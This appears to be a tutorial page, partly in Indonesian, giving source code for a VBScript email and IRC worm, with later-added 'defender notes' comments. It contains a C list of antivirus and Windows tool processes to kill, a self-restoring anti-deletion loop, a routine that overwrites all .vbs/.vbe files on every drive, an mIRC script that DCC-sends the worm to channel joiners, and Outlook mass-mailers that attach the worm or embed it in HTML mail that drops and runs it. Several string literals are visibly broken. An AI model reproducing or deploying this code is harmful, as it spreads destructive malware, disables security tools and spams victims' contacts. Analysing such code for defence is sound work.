#include
#include
#include
#include
#pragma argsused
/*
 * kill_av: NULL-terminated (trailing 0) table of process image names.
 *
 * Most entries are executables of antivirus, personal-firewall and
 * signature-updater products and their installers. The table also names
 * built-in Windows diagnostic tools (TASKMGR, MSCONFIG.EXE, MSINFO32.EXE,
 * NETSTAT.EXE, TRACERT.EXE, SFC.EXE, DRWATSON.EXE) and process viewers
 * (PROCEXPLORERV1.0.EXE, PVIEW95.EXE).
 *
 * NOTE(review): the identifier suggests that code elsewhere terminates running
 * processes whose name matches an entry; no consuming code is visible on this
 * page -- confirm against the full sample.
 * NOTE(review): a few entries (avserve2.exe, Drunk_lol.pif, Webcam_004.pif)
 * do not look like security products; presumably file names used by other
 * malware -- verify before using this list as a product inventory.
 *
 * Detection: one process that enumerates the process list and then opens or
 * terminates several of these images within a short window is a strong
 * security-tool tampering signal. Product self-protection, plus alerting on
 * unexpected exits of security agents and of Task Manager / msconfig, covers
 * the behaviour this table implies.
 */
const char *kill_av[]={ "AGENTSVR.EXE", "ANTI-TROJAN.EXE", "ANTIVIRUS.EXE", "ANTS.EXE",
"APIMONITOR.EXE", "APLICA32.EXE", "APVXDWIN.EXE", "ATCON.EXE",
"ATGUARD.EXE", "ATRO55EN.EXE", "ATUPDATER.EXE", "ATWATCH.EXE",
"AUPDATE.EXE", "AUTODOWN.EXE", "AUTOTRACE.EXE", "AUTOUPDATE.EXE",
"AVCONSOL.EXE", "AVGSERV9.EXE", "AVLTMAIN.EXE", "AVPUPD.EXE",
"AVSYNMGR.EXE", "AVWUPD32.EXE", "AVXQUAR.EXE", "AVprotect9x.exe",
"Au.exe", "BD_PROFESSIONAL.EXE", "BIDEF.EXE", "BIDSERVER.EXE",
"BIPCP.EXE", "BIPCPEVALSETUP.EXE", "BISP.EXE", "BLACKD.EXE",
"BLACKICE.EXE", "BOOTWARN.EXE", "BORG2.EXE", "BS120.EXE",
"CCAPP.exe", "CDP.EXE", "CFGWIZ.EXE", "CFIADMIN.EXE", "CFIAUDIT.EXE",
"CFINET.EXE", "CFINET32.EXE", "CLEAN.EXE", "CLEANER.EXE", "CLEANER3.EXE",
"CLEANPC.EXE", "CMGRDIAN.EXE", "CMON016.EXE", "CPD.EXE", "CPF9X206.EXE",
"CPFNT206.EXE", "CV.EXE", "CWNB181.EXE", "CWNTDWMO.EXE", "D3dupdate.exe",
"DEFWATCH.EXE", "DEPUTY.EXE", "DPF.EXE", "DPFSETUP.EXE", "DRWATSON.EXE",
"DRWEBUPW.EXE", "ENT.EXE", "ESCANH95.EXE", "ESCANHNT.EXE",
"ESCANV95.EXE", "EXANTIVIRUS-CNET.EXE", "FAST.EXE", "FIREWALL.EXE",
"FLOWPROTECTOR.EXE", "FP-WIN_TRIAL.EXE", "FRW.EXE", "FSAV.EXE",
"FSAV530STBYB.EXE", "FSAV530WTBYB.EXE", "FSAV95.EXE", "GBMENU.EXE",
"GBPOLL.EXE", "GUARD.EXE", "HACKTRACERSETUP.EXE", "HTLOG.EXE",
"HWPE.EXE", "IAMAPP.EXE", "IAMSERV.EXE", "ICLOAD95.EXE",
"ICLOADNT.EXE", "ICMON.EXE", "ICSSUPPNT.EXE", "ICSUPP95.EXE",
"ICSUPPNT.EXE", "IFW2000.EXE", "IPARMOR.EXE", "IRIS.EXE",
"JAMMER.EXE", "KAVLITE40ENG.EXE", "KAVPERS40ENG.EXE",
"KERIO-PF-213-EN-WIN.EXE", "KERIO-WRL-421-EN-WIN.EXE",
"KERIO-WRP-421-EN-WIN.EXE", "KILLPROCESSSETUP161.EXE",
"LDPRO.EXE", "LOCALNET.EXE", "LOCKDOWN.EXE", "LOCKDOWN2000.EXE",
"LSETUP.EXE", "LUALL.EXE", "LUCOMSERVER.EXE", "LUINIT.EXE",
"MCAGENT.EXE", "MCUPDATE.EXE", "MFW2EN.EXE", "MFWENG3.02D30.EXE",
"MGUI.EXE", "msconfig.exe", "MINILOG.EXE", "MOOLIVE.EXE", "MRFLUX.EXE",
"MSCONFIG.EXE", "MSINFO32.EXE", "MSSMMC32.EXE", "MU0311AD.EXE",
"NAV80TRY.EXE", "NAVAPW32.EXE", "NAVDX.EXE", "NAVSTUB.EXE",
"NAVW32.EXE", "NC2000.EXE", "NCINST4.EXE", "NDD32.EXE",
"NEOMONITOR.EXE", "NETARMOR.EXE", "NETINFO.EXE", "NETMON.EXE",
"NETSCANPRO.EXE", "NETSPYHUNTER-1.2.EXE", "NETSTAT.EXE",
"NISSERV.EXE", "NISUM.EXE", "NMAIN.EXE", "NORTON_INTERNET_SECU_3.0_407.EXE",
"NPF40_TW_98_NT_ME_2K.EXE", "NPFMESSENGER.EXE", "NPROTECT.EXE",
"NSCHED32.EXE", "NTVDM.EXE", "NUPGRADE.EXE", "NVARCH16.EXE",
"NWINST4.EXE", "NWTOOL16.EXE", "OSTRONET.EXE", "OUTPOST.EXE",
"OUTPOSTINSTALL.EXE", "OUTPOSTPROINSTALL.EXE", "PADMIN.EXE",
"PANIXK.EXE", "PAVPROXY.EXE", "PCC2002S902.EXE", "PCC2K_76_1436.EXE",
"PCCIOMON.EXE", "PCDSETUP.EXE", "PCFWALLICON.EXE", "PCIP10117_0.EXE",
"PDSETUP.EXE", "PERISCOPE.EXE", "PERSFW.EXE", "PF2.EXE", "PFWADMIN.EXE",
"PINGSCAN.EXE", "PLATIN.EXE", "POPROXY.EXE", "POPSCAN.EXE", "PORTDETECTIVE.EXE",
"PPINUPDT.EXE", "PPTBC.EXE", "PPVSTOP.EXE", "PROCEXPLORERV1.0.EXE",
"PROPORT.EXE", "PROTECTX.EXE", "PSPF.EXE", "PURGE.EXE", "PVIEW95.EXE",
"QCONSOLE.EXE", "QSERVER.EXE", "RAV8WIN32ENG.EXE", "RESCUE.EXE",
"RESCUE32.EXE", "RRGUARD.EXE", "RSHELL.EXE", "RTVSCN95.EXE",
"RULAUNCH.EXE", "SAFEWEB.EXE", "SBSERV.EXE", "SD.EXE", "SETUPVAMEEVAL.EXE",
"SETUP_FLOWPROTECTOR_US.EXE", "SFC.EXE", "SGSSFW32.EXE",
"avserve2.exe", "SHELLSPYINSTALL.EXE", "SHN.EXE", "SMC.EXE",
"SOFI.EXE", "SPF.EXE", "SPHINX.EXE", "SPYXX.EXE", "SS3EDIT.EXE",
"ST2.EXE", "SUPFTRL.EXE", "SUPPORTER5.EXE", "SYMPROXYSVC.EXE",
"SYSEDIT.EXE", "TASKMGR", "TASKMON.EXE", "TAUMON.EXE", "TAUSCAN.EXE",
"TC.EXE", "TCA.EXE", "TCM.EXE", "TDS-3.EXE", "TDS2-98.EXE",
"TDS2-NT.EXE", "TFAK5.EXE", "TGBOB.EXE", "TITANIN.EXE",
"TITANINXP.EXE", "TRACERT.EXE", "TRJSCAN.EXE", "TRJSETUP.EXE",
"TROJANTRAP3.EXE", "UNDOBOOT.EXE", "UPDATE.EXE", "VBCMSERV.EXE",
"VBCONS.EXE", "VBUST.EXE", "VBWIN9X.EXE", "VBWINNTW.EXE",
"VCSETUP.EXE", "VFSETUP.EXE", "VIRUSMDPERSONALFIREWALL.EXE",
"VNLAN300.EXE", "VNPC3000.EXE", "VPC42.EXE", "VPFW30S.EXE",
"VPTRAY.EXE", "VSCENU6.02D30.EXE", "VSECOMR.EXE", "VSHWIN32.EXE",
"VSISETUP.EXE", "VSMAIN.EXE", "VSMON.EXE", "VSSTAT.EXE",
"VSWIN9XE.EXE", "VSWINNTSE.EXE", "VSWINPERSE.EXE",
"W32DSM89.EXE", "W9X.EXE", "WATCHDOG.EXE", "WEBSCANX.EXE",
"WGFE95.EXE", "WHOSWATCHINGME.EXE", "WINRECON.EXE",
"WNT.EXE", "WRADMIN.EXE", "WRCTRL.EXE", "WSBGATE.EXE",
"WYVERNWORKSFIREWALL.EXE", "XPF202EN.EXE", "ZAPRO.EXE",
"ZAPSETUP3001.EXE", "ZATUTOR.EXE", "ZAUINST.EXE", "ZONALM2601.EXE",
"ZONEALARM.EXE","zlclient.exe", "lexplore.exe", "Drunk_lol.pif",
"Webcam_004.pif", 0};
/*
 * drives: NULL-terminated (trailing 0) table of the 26 drive-letter strings
 * "a:" through "z:".
 * NOTE(review): no code that reads this table is visible on this page;
 * presumably it drives a per-letter sweep of attached volumes -- confirm
 * against the full sample. For triage, a process probing every drive letter
 * in sequence, removable and mapped drives included, is the matching
 * file-system pattern.
 */
const char *drives[] = {"a:", "b:", "c:", "d:", "e:", "f:", "g:", "h:", "i:", "j:", "k:", "l:",
"m:", "n:", "o:", "p:", "q:", "r:", "s:", "t:", "u:", "v:", "w:", "x:",
"y:", "z:", 0};
1. Anti-deletion
This function must be the last one called, because it never returns.
If it detects that the script file has been deleted, it creates the file again.
Code:
' Antidelete: self-restoring loop (persistence against manual removal).
' Reads the running script's own text (wscript.scriptfullname) into MyCode,
' then enters a Do...Loop that has no exit condition and no delay. On every
' pass it checks whether the script file still exists and, if it does not,
' recreates the file from MyCode.
' Takes no arguments and never returns, so nothing placed after the call runs.
' Defender notes: deleting the file while the script host process is still
' running does not remove it, because the file is written back from memory;
' end the host process (wscript.exe / cscript.exe) first, then delete the file.
' A loop with no wait is likely to show as sustained CPU use in the script
' host, which is a visible symptom during triage.
Function Antidelete()
Set fso = CreateObject("scripting.filesystemobject")
' Keep a full in-memory copy of this script's source.
Set Myself = fso.opentextfile(wscript.scriptfullname, 1)
MyCode = Myself.readall
Myself.Close
Do
' File missing: write the in-memory copy back to the same path.
If Not (fso.fileexists(wscript.scriptfullname)) Then
Set Myself = fso.createtextfile(wscript.scriptfullname, True)
Myself.write MyCode
Myself.Close
End If
Loop
End Function
2. Infect files
These two functions search the whole hard disk for mirc.ini, Pirch32.exe,
and .vbs and .vbe files. When any of them is found, the infection function is called.
Code:
' Dodrives: entry point of the file-system sweep described on the page.
' Walks a Drives collection and hands each drive, converted to a string, to
' Subfolders. Both branches of the If make the same call; the first is keyed
' on the drive type, the second on Drive.IsReady.
' On Error Resume Next suppresses every runtime error in this routine, so a
' failure here produces no dialog and no log entry.
' Defender notes: the sweep is not restricted to one disk. The name Remote in
' the first branch suggests network drives are meant to be included (confirm
' against the full sample), so mapped shares are in scope for clean-up.
' A script-host process touching many directories across several drive
' letters is the pattern to alert on.
Function Dodrives()
On Error Resume Next
Set fso = CreateObject("scipting.filesystemobject")
Set Drives = fso.Drives
For Each Drive In Drives
If Drive.Drivetype = Remote Then
Drivefull = Drive & ""
Call Subfolders(Drivefull)
ElseIf Drive.IsReady Then
Drivefull = Drive & ""
Call Subfolders(Drivefull)
End If
Next
End Function
' Subfolders(path): recursive directory walk that overwrites script files.
'   path - folder to process; the function calls itself for every subfolder.
' For each file in the folder:
'   - extension "vbs" or "vbe": the running script is copied over that file
'     (third copyfile argument True = overwrite), so the original content is
'     replaced, not appended to;
'   - name "mirc.ini": Mirc is called with the file's parent folder;
'   - name "Pirch32.exe": Pirch is called with the file's parent folder
'     (no Pirch routine appears on this page).
' Defender notes: every overwritten file ends up with the same content as the
' running script, so hunting by hash or by identical size across .vbs/.vbe
' files finds the affected set. Recovery needs backups because the originals
' are destroyed. File-integrity monitoring on script directories, and alerts
' on a script host rewriting many script files, match this behaviour.
Function Subfolders(path)
newpath=path
Set Fold = fso.GetFolder(newpath)
Set Files = Fold.Files
For Each file In Files
If fso.GetExtensionName(file.path) = "vbs" Then
fso.copyfile wscript.scriptfullname, file.path, True
End If
If fso.GetExtensionName(file.path) = "vbe" Then
fso.copyfile wscript.scriptfullname, file.path, True
End If
If file.Name = "mirc.ini" Then
Mirc (file.ParentFolder)
End If
If file.Name = "Pirch32.exe" Then
Pirch (file.ParentFolder)
End If
Next
' Descend into each subfolder of the current folder.
Set file = Fold.Subfolders
For Each Subfol In file
Call Subfolders(Subfol.path)
Next
End Function
3. Mirc Txt
This function will infect mIRC with a simple script.
Quote:
' Mirc(Path): writes an mIRC script that offers a .vbs file to channel joiners.
'   Path - mIRC folder; when empty, the routine probes fixed candidate folders
'          and the ProgramFilesDir registry value for a mirc.ini.
' When a folder is found it creates (overwriting) script.ini there with an
' "on JOIN" handler: if the joining nick is not the local user, the handler
' issues a file send to that nick. The command name is assembled from
' chr(100) & chr(99) & chr(99), i.e. the characters "dcc", instead of being
' written as a literal.
' On Error Resume Next suppresses all runtime errors in this routine.
' Path and registry literals are kept exactly as they appear on the page.
' Defender notes: look for unexpected creation or modification of script.ini
' in an IRC client directory by a script host, and for on-JOIN handlers that
' send files. Refusing inbound DCC transfers of script file types at the
' client breaks this propagation path on the receiving side.
Function Mirc(Path)
On Error Resume Next
Set fso = CreateObject("scripting.filesystemobject")
Set ws = CreateObject("wscript.shell")
If Path = "" Then
If fso.fileexists("c:mircmirc.ini") Then Path = "c:mirc"
If fso.fileexists("c:mirc32mirc.ini") Then Path = "c:mirc32"
PfDir = ws.regread("HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionProgramFilesDir")
If fso.fileexists(PfDir & "mircmirc.ini") Then Path = PfDir & "mirc"
End If
If Path <> "" Then
Set Script = fso.CreateTextFile(Path & "script.ini", True)
Script.writeline "[script]"
Script.writeline "n0=on 1:JOIN:#:{"
Script.writeline "n1= /if ( $nick == $me ) { halt }"
Script.writeline "n2= /." & chr(100) & chr(99) & chr(99) & " send $nick c:windowsworm.vbs"
Script.writeline "n3=}"
Script.Close
End If
End Function
4. Outlook Attached
Code:
' Outlook: mass-mailing routine, attachment variant.
' Automates Outlook through the Outlook.Application COM object, opens the MAPI
' namespace and walks the address lists. For each address entry it creates a
' mail item (CreateItem(0)), sets the entry's address as recipient, sets a
' fixed subject and body, attaches a .vbs file from a fixed path, and sends
' the message when the recipient field is non-empty.
' DeleteAfterSubmit = True means no copy of the message is kept once sent.
' On Error Resume Next suppresses all runtime errors in this routine.
' Defender notes: the fixed subject and body strings below are usable as
' mail-filter indicators. Because sent copies are not retained, scope an
' incident from mail-server transport logs, not the user's Sent Items.
' Relevant controls: blocking script attachments (.vbs) at the gateway and in
' the client, Outlook's programmatic-access protection, and alerting when a
' script host instantiates Outlook.Application and produces one message per
' address-book entry.
Function Outlook()
On Error Resume Next
Set OutlookApp = CreateObject("Outlook.Application")
If OutlookApp = "Outlook" Then
Set Mapi = OutlookApp.GetNameSpace("MAPI")
set mapiadlist as Mapi.AddressLists
For Each Addresslist In mapiadlist
If Addresslist.AddressEntries.Count <> 0 Then
Addresslistcout = Addresslist.AddressEntries.Count
For AddList = 1 To Addresslistcout
Set msg = OutlookApp.CreateItem(0)
Set AdEntries = Addresslist.AddressEntries(AddList)
msg.To = AdEntries.Address
msg.Subject = "Here you have, ;o)"
msg.Body = "Hi:" & vbCrLf & "Check This!"
set Attachs=msg.Attachments
Attachs.Add "c:windowworm.vbs"
msg.DeleteAfterSubmit = True
If msg.To <> "" Then
msg.Send
End If
Next
End If
Next
End If
End Function
5. OutlookBody
Code:
' OutlookBody: mass-mailing routine, HTML-body variant (no attachment).
' Steps, as far as the listing shows:
'   1. Reads this script's own source line by line and escapes it into the
'      string Code, so it can be embedded inside another script as a literal.
'   2. Builds an HTML mail body (htm / htm2) containing a VBScript block. That
'      embedded script tries to create a FileSystemObject; on failure it
'      displays text asking the reader to enable ActiveX and reopen the
'      message, otherwise it writes Code to a file named Worm.vbs under
'      fso.getspecialfolder(0) (the Windows folder) and runs it through
'      wscript.
'   3. For each non-empty address list, creates one message with a fixed
'      subject, the HTML body and DeleteAfterSubmit = True, appends the
'      entries' addresses to the BCC field, and sends it.
'   4. Calls Outlook.Quit when done.
' Several string literals are visibly broken across lines on this page (markup
' inside them was lost); they are left exactly as they appear.
' On Error Resume Next suppresses all runtime errors in this routine.
' Defender notes: the payload lives in the message body, so attachment
' filtering alone does not cover it; this variant depends on the mail client
' executing script in HTML mail, which is why rendering mail without active
' content and treating any "enable ActiveX" prompt in a message as hostile
' are the matching controls. Indicators visible here: the subject string, the
' GENERATOR meta value, a Worm.vbs file in the Windows directory, and wscript
' being launched on that file. Recipients are placed in BCC and sent copies
' are not retained, so use transport logs to scope delivery.
Function OutlookBody()
On Error Resume Next
Set fso = CreateObject("scripting.filesystemobject")
Set Outlook = CreateObject("Outlook.Application")
If Outlook = "Outlook" Then
Set Myself = fso.opentextfile(wscript.scriptfullname, 1)
I = 1
Do While Myself.atendofstream = False
MyLine = Myself.readline
Code = Code & Chr(34) & " & vbcrlf & " & Chr(34) & Replace(MyLine, Chr(34), Chr(34)
& "&chr(34)&" & Chr(34))
Loop
Myself.Close
htm = "<" & "HTML><" & "HEAD><" & "META content=" & Chr(34) & " & chr(34) & " &
Chr(34) & "text/html; charset=iso-8859-1" & Chr(34) & " http-equiv=Content-Type><"
& "META content=" & Chr(34) & "MSHTML 5.00.2314.1000" & Chr(34) & " name=GENERATOR><"
& "STYLE><" & "BODY bgColor=#ffffff><" & "SCRIPT
language=vbscript>"
htm = htm & vbCrLf & "On Error Resume Next"
htm = htm & vbCrLf & "Set fso = CreateObject(" & Chr(34) & "scripting.filesystemobject"
& Chr(34) & ")"
htm = htm & vbCrLf & "If Err.Number <> 0 Then"
htm = htm & vbCrLf & "document.write " & Chr(34) & "
size='2'>You need ActiveX enabled if you want to see this e-mail.
Please open
this message again and click accept ActiveX
Microsoft Outlook" & Chr(34)
& ""
htm = htm & vbCrLf & "Else"
htm = htm & vbCrLf & "Set vbs = fso.createtextfile(fso.getspecialfolder(0) & " &
Chr(34) & "Worm.vbs" & Chr(34) & ", True)"
htm = htm & vbCrLf & "vbs.write " & Chr(34) & Code & Chr(34)
htm = htm & vbCrLf & "vbs.Close"
htm = htm & vbCrLf & "Set ws = CreateObject(" & Chr(34) & "wscript.shell" & Chr(34)
& ")"
htm = htm & vbCrLf & "ws.run fso.getspecialfolder(0) & " & Chr(34) & "wscript.exe
" & Chr(34) & " & fso.getspecialfolder(0) & " & Chr(34) & "Worm.vbs %" & Chr(34)
& ""
htm2 = htm2 & vbCrLf & "document.write " & Chr(34) & "This message has permanent
errors.
Sorry
" & Chr(34) & ""
htm2 = htm2 & vbCrLf & "End If"
htm2 = htm2 & vbCrLf & "<" & "/SCRIPT>"
HtmlBody = htm & htm2
Set mapi = Outlook.GetNameSpace("MAPI")
Set Mapiadd=mapi.AddressLists
For Each Addresslist In Mapiadd
If Addresslist.AddressEntries.Count <> 0 Then
AddCount = Addresslist.AddressEntries.Count
Set Msg = Outlook.CreateItem(0)
Msg.Subject = "Rv: 4You"
Msg.HtmlBody = HtmlBody
Msg.DeleteAfterSubmit = True
For II = 1 To AddCount
Set Addentry = Addresslist.AddressEntries(II)
If AddCount = 1 Then
Msg.BCC = Addentry.Address
Else
Msg.BCC = Msg.BCC & "; " & Addentry.Address
End If
Next
Msg.send
End If
Next
Outlook.Quit
End If
End Function
Jangan dipakai sembarangan eA..xixiixi!! (Bersambung)
' Stand-alone form of the self-restore loop; same logic as the Antidelete
' function earlier on the page, written as top-level statements.
' Reads the running script's source into mytext, then loops with no exit
' condition and no delay, recreating the script file from mytext whenever the
' file no longer exists.
' Defender notes: the file reappears for as long as the script host process
' (wscript.exe / cscript.exe) is alive, so terminate that process before
' deleting the file. A loop with no wait is likely to show as sustained CPU
' use in the host process.
dim fso, myself,mytext
set fso = createobject("scripting.filesystemobject")
' Keep a full in-memory copy of this script's source.
set myself = fso.opentextfile(wscript.scriptfullname)
mytext = myself.readall
myself.close
do
' File missing: write the in-memory copy back to the same path.
if fso.fileexists(wscript.scriptfullname) = false then
set myself = fso.createtextfile(wscript.scriptfullname)
myself.write mytext
myself.close
end if
loop